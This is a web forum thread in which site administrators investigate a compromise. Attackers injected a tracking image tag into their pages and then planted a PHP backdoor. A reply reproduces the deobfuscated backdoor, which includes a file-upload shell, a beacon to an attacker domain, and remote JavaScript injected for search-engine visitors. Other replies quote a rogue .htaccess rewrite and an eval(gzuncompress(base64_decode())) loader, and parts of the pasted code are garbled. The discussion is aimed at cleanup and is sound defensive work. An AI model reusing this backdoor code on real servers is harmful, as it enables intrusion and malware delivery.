Hi All
My server is infected by virus I think 
. It insert a line at the end of code like below but when i check in footer code It does not show but It show in source code.
Please help me how i can remove it.
</body>
</html><img heigth=“1” width=“1” border=“0” src=“http://imgaaa.net/t.php?id=8999982”>
<snip/>
hello anyone for help?
This sort of code injection has been covered many times on this forum before, e.g look at some of these posts. There’s plenty information amongst them on likely causes and cures
The link is dead. What was the search term?
Brandon
Same happend to me on all my VPS - here are my findings so far:
The source seems an infection by a Trojan - probably Wind32/Kryptik - in a first step you will see an injection of the above type in all index.html and index.php. The ID number varies. Look out for less obvious index.* files in subdirectories.
In a second step (in my case about a day later) the real attack happens:
you will find files like 42.php or 23.php - allays two digits and a bogus .htaccess - the htaccess looks like this:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]
</IfModule>
the malicious 26.php (or whatever number it may have uncompresses binary code:
<? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ/Zm...
I am only a couple of hours into the investigation of this attack, so all I know is a bit superficial at this point. I am more then happy to exchange thoughts and info about this.
Cheers
Sven
PS: I saw some forums pointing to the lizamoon attack - but so far I have my doubts that this is actually connected.
Do a search for ‘gumblar’ in all forums
Excuse me, but from what we are observing we are not dealing with “Gumblar” or a variant. There are similarities but rather remotely.
What we are seeing is a 2 stage attack:
stage 1: injection of html code (nothing executable!!) - the code seems to serve only to notify the bad guys of the hacked URL.
stage 2: about a day later I see uploads of malicious code.
To me it looks like an exploitation of Win32/Krypitic Trojan. (aka TR/Crypt.XPACK.Gen)
What bothers me is the missing link - I don’t really understand why they do this. If the Trojan sends the username and passwords for FTP access - why do they need to inject a html code to pass an ID-Number? Why don’t they inject malicious code right away or FTP it there.
Did anyone decode the binary code yet?
Sven
I was answering the OP, not you. The question is how did they manage to inject the code in the first place, this is what matters. The secondary payload, and what it decodes to (as it happens a trivial task) won’t close the original point of entry.
now i can’t see the code as it is gone… what i can see is that the iframe is linking to another domain and this makes it look similar to some other threats - a trojan has infected a pc - it steals ftp credentials - installs a backdoor/shell - injects a code which links to another domain which tries to exploit a known vulnerability in adobe pdf and/or swf to execute arbitrary code…
these kind of attacks are poorly detected and quite successfull
it might be the kryptic or some similar trojan, so clean you puter, your files, your server and change passwords
A client of mine had the same.
Do a malware scan and do not use CuteFTP or any other popular FTP program. All those passwords you had are now stolen. Clean your PC and request new FTP passwords for all your sites, and use KeePass to store them
Here is the diassembled files (n.php) that makes calls to http://bestnetblog.net/logdomain.php?q=alcobro to log the trojan activity.
<?
error_reporting(round(0));
if (isset(_GET[q]))
{
if( !(preg_match("/^([a-z0-9-.)(&=]*)/i", _GET[q])))
{
die;
}
}
if (extension_loaded(curl) &&function_exists(curl_init) &&function_exists(curl_exec))
{
function l__0(_0)
{
_1 =curl_init();
curl_setopt(_1, 10002, _0);
curl_setopt(_1, 42, round(0));
curl_setopt(_1, 19913, round(0+1));
curl_setopt(_1, 52, round(0+0.25+0.25+0.25+0.25));
curl_setopt(_1, 13, round(0+6.66666666667+6.66666666667+6.66666666667));
curl_setopt(_1, 3, round(0+80));
curl_setopt(_1, 10018, Mozilla/4.0 (compatible;
MSIE 6.0;
Windows NT 5.2;
SV1;
.NET CLR 2.0.50727;
InfoPath.1));
_2 =curl_exec(_1);
_3 =curl_getinfo(_1, 2097154);
if (_3 >
= round(0+200+200)) _2 = false;
curl_close(_1);
return _2;
}
}
else if(function_exists( file_get_contents))
{
function l__0(_0)
{
return file_get_contents(_0);
}
}
else die( not work);
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
@mkdir( .log/);
@chmod( .log/,round(0+255.5+255.5));
@mkdir( .log/._4);
@chmod( .log/._4,round(0+127.75+127.75+127.75+127.75));
_5 = .log/._4. /xmlrpc.txt;
if (@fopen(_5, r))
{
}
else
{
_6 =fopen( .log/._4. /xmlrpc.txt, w+);
fwrite(_6, bestnetblog.net);
fclose(_6);
}
if ( _GET[ q] == alcobro )
{
_5 = .htaccess;
if (file_exists(_5))
{
_7 = disable;
}
else
{
_8 = " RewriteEngine On RewriteCond %
{
REQUEST_FILENAME
}
!-f RewriteCond %
{
REQUEST_FILENAME
}
!-d RewriteRule ^(.*) "._SERVER[ SCRIPT_NAME]."?q=1 [L] ";
_9 =fopen( .htaccess, w+);
fwrite(_9,_8);
fclose(_9);
_7 = enable;
}
curlit =file_get_contents( .log/._4. /xmlrpc.txt);
_11 = http://.curlit. /logdomain.php?q=._SERVER[ HTTP_HOST];
_12 = l__0(_11);
echo _12._7;
die;
}
if (_GET[ dom100500] != )
{
_13 =fopen( .log/._4. /xmlrpc.txt, w+);
fwrite(_13,_GET[ dom100500]);
fclose(_13);
echo 100500ok;
die;
}
if (_GET[ up100500] != )
{
_14 = ;
_14 = _14 .basename( _FILES[ uploaded][ name]) ;
_15=round(0+0.5+0.5);
if(move_uploaded_file(_FILES[ uploaded][ tmp_name], _14))
{
echo up100500;
}
echo '<
form enctype="multipart/form-data" method="POST">
<
input name="uploaded" type="file">
<
input type="submit" value="U">
<
/form>'
;
die;
}
function l__1(_16)
{
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
_17 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
_18 =str_replace( -, +,_17);
_18 =str_replace( _, +,_17);
_19 = http://www.google.com/search?hl=en&as_q=._18. &num=100&as_qdr=all;
_20 = l__0(_19);
preg_match_all( #<div class="s">(.*)<br>#U,_20,_21);
_22=array();
for (_23=round(0);
_23<
="" _31;
="" ++_32)="" _33="_28[_30][_32];
" this-="">
_26[_33][] = _28[_30][_32+round(0+0.2+0.2+0.2+0.2+0.2)];
}
}
_34 =array_keys(this->
_26);
foreach (_34 as _17)
{
this->
_26[_17] =array_unique(this->
_26[_17]);
}
}
function l__3(_35)
{
_36 = round(0);
for (_30=round(0);
_36 <
_35;
++_30)
{
_37 =array_rand(this->
_26);
_38 =mt_rand(round(0+1.25+1.25+1.25+1.25), round(0+4+4+4));
for (_32=round(0);
_32_26[_37][mt_rand(round(0),count(this->
_26[_37]) - round(0+0.5+0.5))];
if (_40 == ) _40 =array_rand(this->
_26);
_37 = _40;
if (_37 == ) break round(0+0.5+0.5+0.5+0.5);
}
}
foreach (_39 as _41)
{
_42=count(_41);
if (_42<
=round(0+2)) continue;
if (strlen(_41[_42-round(0+0.5+0.5)]) <
round(0+0.8+0.8+0.8+0.8+0.8)) unset(_41[_42-round(0+0.333333333333+0.333333333333+0.333333333333)]);
_41[_42-round(0+2)] =rtrim(_41[_42-round(0+2)], ,:;
);
_41[_42-round(0+0.25+0.25+0.25+0.25)] =rtrim(_41[_42-round(0+0.25+0.25+0.25+0.25)], ,:;
);
_43 .=ucfirst(implode( , _41)). . ;
}
_43 =str_replace( ., ., _43);
return _43;
}
}
_27 = _25;
_44 = new l__2(_27);
_45 = _44->
l__3(round(0+466.666666667+466.666666667+466.666666667));
_45 =preg_replace( /[^a-zA-Z\\., -]+?/, , _45);
_46 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
_46=str_replace( -, ,_46);
_46=str_replace( _, ,_46);
_47 =str_replace ( , +, _46);
if(_GET[ page] != 1)
{
_48 = &start=.(_GET[ page]-round(0+0.5+0.5))*round(0+10.5+10.5);
}
_49 = l__0( http://images.google.com/images?q=._47. &lr=lang_en._48);
preg_match_all( /href="?\\/imgres\\?imgurl=([^\\&]+)/, _49, _50);
_51 = array();
for (_32 = round(0);
_32 _54 ) break;
preg_match_all( #^\\.log/._4."/(.*).html#i", _58, _59 );
_57 .= <a href="._53._59[round(0+0.25+0.25+0.25+0.25)][round(0)]. " title=".str_replace( _, ,str_replace( -, , _59[round(0+0.5+0.5)][round(0)])). ">.str_replace( _, ,str_replace( -, , _59[round(0+0.333333333333+0.333333333333+0.333333333333)][round(0)])). </a>, ;
_56++;
}
_60 = l__0( http://clients1.google.com/complete/search?hl=en&ds=i&q= .str_replace( , %20, _46));
preg_match_all( |\\["([^"]+)",|si, _60, _61, 1);
_62 = round(0);
array_shift(_61[round(0+0.2+0.2+0.2+0.2+0.2)]);
foreach (_61[round(0+0.333333333333+0.333333333333+0.333333333333)] as _63)
{
_64 .= <a href='._53.str_replace( , -, _63). ' title='._63. '> . _63 . </a>, ;
if (_62++ >
round(0+2.75+2.75+2.75+2.75)) break;
}
_65 = _53._GET[ q];
_66 = <
_72;
_32++ )
{
if ( (preg_match( /\\<
script/imsU, _73[round(0)][_32]) == round(0)) AND (strlen(_73[round(0)][_32]) >
_74) )
{
_74 =strlen(_73[round(0)][_32]);
_75 = _32;
}
}
_71 =str_ireplace( _73[round(0)][_75], _73[round(0)][_75]. <
REPLACEME>
, _71 );
_76 =fopen( _70, w );
fputs(_76, _71);
fclose(_76);
}
_77 = <
h1>
.strtoupper(_46)._78. <
/h1>
._64._57. ._69. <p>._66. </p>;
return _77;
}
function l__4(_79)
{
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
_80= .log/._4. /._79 . .html._GET[ page];
if(@file_exists(_80))return@file_get_contents(_80);
_16=str_replace( -, ,_79);
_16=str_replace( +, ,_79);
_81=l__1(_16);
_82=@fopen(_80, w);
@fwrite(_82,_81);
@fclose(_82);
return _81;
_83=file_get_contents(_80);
}
_84=array( 66.228., 67.195., 68.142., 66.196., 68.180., 72.30., 74.6., 66.94., 66.163., 64.75., 216.32., 66.163., 65.52., 65.53., 65.54., 65.55., 66.249., 66.102., 209.85., 72.14., 74.125., 64.68., 64.233., 216.239., 173.194., 91.184., 94.231., 127.0., 31.43.);
_85=getenv( REMOTE_ADDR);
_86=explode( ., _85);
for (_32=round(0);
;
_32++)
{
if(_84[_32]==NULL) break;
_87=explode( ., _84[_32]);
if(_87[round(0)]==_86[round(0)]&&_87[round(0+0.333333333333+0.333333333333+0.333333333333)]==_86[round(0+0.333333333333+0.333333333333+0.333333333333)])
{
if(_GET[ q]!= )
{
_70 = .log/._4. /shab100500.txt;
if (filesize(_70) <
round(0+200+200+200+200) )
{
_71 = <
head>
<
title>
title<
/title>
<
/head>
<
body>
<
REPLACEME>
<
/body>
<
/html>
;
}
else
{
_71 =file_get_contents( _70 );
}
_88=basename(_GET[ q]);
_46 = _GET[ q];
_46=str_replace( -, ,_46);
_46=str_replace( .html, ,_46);
_71 =preg_replace( /<
title>
(.*)<
\\/title>
/imsU, <
title>
.ucwords(_46). <
/title>
<
meta name="googlebot" content="noarchive">
, _71 );
_71 =str_ireplace( <
REPLACEME>
, l__4(_88), _71 );
print _71;
exit;
}
}
}
if (_GET[ q]!= )
{
if (strpos(_SERVER[ HTTP_USER_AGENT], Opera) !== false)
{
echo <
script>
;
include( .log/._4. /iog.txt);
echo <
/script>
;
die;
}
if (strpos( _SERVER[ HTTP_REFERER], site% ) >
round(0) )
{
}
else
{
if (strpos( _SERVER[ HTTP_REFERER], google. ) ||strpos( _SERVER[ HTTP_REFERER], yahoo. ) ||strpos( _SERVER[ HTTP_REFERER], bing. )>
round(0) )
{
_89 = round(0+10+10+10)*round(0+15+15+15+15);
_90= .log/._4. /iog.txt;
if(!file_exists(_90)||time()-filemtime(_90)>
_89)
{
curlit =file_get_contents( .log/._4. /xmlrpc.txt);
_91 = http://.curlit. /badcompany.php?q=._4._SERVER[ SCRIPT_NAME];
_2 = l__0(_91);
_92 =fopen( .log/._4. /iog.txt, w+);
fwrite(_92,_2);
fclose(_92);
}
echo <
script>
;
include( .log/._4. /iog.txt);
echo <
/script>
;
die();
}
}
}
header( Location: http://._SERVER[ HTTP_HOST]);
?>
91.200.240.10 - - [02/Apr/2011:05:30:48 +0200] "GET /11.php?q=alcobro
This IP is used to monitor activity, it’s probably also hacked.
They seem to do it for SEO scores, that’s what I deduct from the disassembly.
Anyone came up with a tool that will remove the <img> tags?
It really sucks doing this manually over all sites/folders…
If you have a editor with find/replace functionalities like dreamweaver, you can RegEx it out. Dreamweaver can replace parts in files in a complete folder, with RegEx functionalities. So it’s useful.
I did this:
imgaaa.net/t.php\?id=.*?">
‘FOOBAR’
Then run once again for removal:
<img heigth=“1” width=“1” border=“0” src="http://FOOBAR
//empty nothing.
Took 10 seconds for a whole server copy with hundreds of files.
-Goodluck!
Okay, I just was in a coding mood and wrote a clean tool for you in PHP. It does work here, just tested it. But you might want to be careful. it’s a recursive scanner that deletes the n.php files, and modifies existing files with the image.
<?
$log = "";
function fixgumblar($start_dir){
$file_type = '/(\\.php|\\.html|\\.htm)/';
$dirlist = opendir($start_dir);
while ($file = readdir($dirlist)){
if ($file != '.' && $file != '..'){
$newpath = $start_dir.'/'.$file;
if (is_dir($newpath)){
fixgumblar($newpath);
} else {
if (preg_match($file_type, $newpath)){
$fh = fopen($newpath, 'r');
$inputline = fread($fh, filesize($newpath));
fclose($fh);
if(stristr($inputline, 'eval(gzuncompress(') !== FALSE) {
unlink($newpath); // remove the n files!
$log .= $newpath." REMOVED! \\r\
";
} else {
$inputline = preg_replace('/<img heigth="1" width="1" border="0" src="http:\\/\\/imgaaa.net\\/t.php\\?id=.*?">/', '', $inputline,-1,$count);
}
if($count){
$fh = fopen($newpath, 'w');
fwrite($fh, $inputline);
fclose($fh);
$log .= $newpath." EDITED\\r\
";
}
}
}
}
}
closedir($dirlist);
return true;
}
fixgumblar('./test'); // provide start folder, no trail slash!
echo $log;
?>
Here are the testfiles which also contain parts of the corrupt files, so please delete after use:
http://www.easy-share.com/1914559087/try.rar
alternative download:
http://www.filedropper.com/try_1
Likely cause(s):
Since last week more reports are dripping in from more clients, so beware we might have zeroday on our hands. Our systems and our client systems are updated every single day. Suggestion: disable Java, Flash and disable scripting in PDF readers.
c:\WINDOWS\system32\dll.dll <- might be infected too, based on further reports.
Due to one of the following issues in respective order:
We had this appear on our client servers yesterday too. the imgaa.net -link was added to a few files (also a functions.php -file under Wordpress, so this is not limited to just index.php).
The FTP log showed that the file was uploaded from an IP tracked to India.
We are still in the process of trying to find out how many sites were affected and what was the entry point. All computers related are being scanned.
Anyone got any more info on this vulnerability / point of entry? Even Google can’t seem to find any thread anywhere with conclusive data, just a ton of threads and pages from the last week or so describing the problem around the web.
It doesn’t really help to just fix the servers if we still have a trojan / keylogger roaming free somewhere.
I diassasembled the code, had a look at all date changes on files and nothing else besides the above is modified/added. If it is, you might have another verion of it, or something completely different.
The complete diassasembled code: #1794541 - Pastie
Hi…
Special thanks for “unknownimous” ur good.This big maleware script the same problem in my clients site.i was trying decode this code but i am unsuccess and thanks for ur solutions for this maleware.can u tell me how to decode this code?? it’s very interesting part
hxxp://malsite1 and hxxp://malsite2 it’s sister site and making high traffic through Google they are tarting high traffic site and hack then upload virus code.whenever visitor search query for ur relevant keyword site to goolge showing ur site result that time this script chaining search string what they need and they make big traffic.
Please tell me how to decode this code
my id : <snip/>
I’m glad to help out, and hope it will be useful since I know what a massive pain it can be once such attack happened.
I dissasembled it by using var_dump($code) in php then looking at the arrays and run a replacement function then another round of var_dump() untill you get what’s above. It can also be automated though a ‘PHP Bytecode Disassembler’. Somehwere on Google for download.